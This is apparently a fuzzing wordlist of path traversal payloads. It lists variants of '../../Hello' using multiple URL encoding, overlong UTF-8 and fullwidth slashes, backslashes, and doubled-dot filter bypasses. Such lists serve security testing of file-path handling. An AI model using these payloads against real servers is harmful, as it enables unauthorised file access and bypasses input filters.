..%2F..%2FHello
..%252F..%252FHello
..%25252F..%25252FHello
..%2525252F..%2525252FHello
..%252525252F..%252525252FHello
..%25252525252F..%25252525252FHello
..%2F..%2FHello
%2e%252F%2e%252FHello
%252e%25252F%252e%25252FHello
%25252e%2525252F%25252e%2525252FHello
%2525252e%252525252F%2525252e%252525252FHello
%252525252e%25252525252F%252525252e%25252525252FHello
../../Hello
..%c0%af..%c0%afHello
..%ef%bc%8f..%ef%bc%8fHello
..\..\Hello
..%5c..%5cHello
..%c0%5c..%c0%5cHello
..%ef%bc%bc..%ef%bc%bcHello
....//....//Hello
..\/..\/Hello
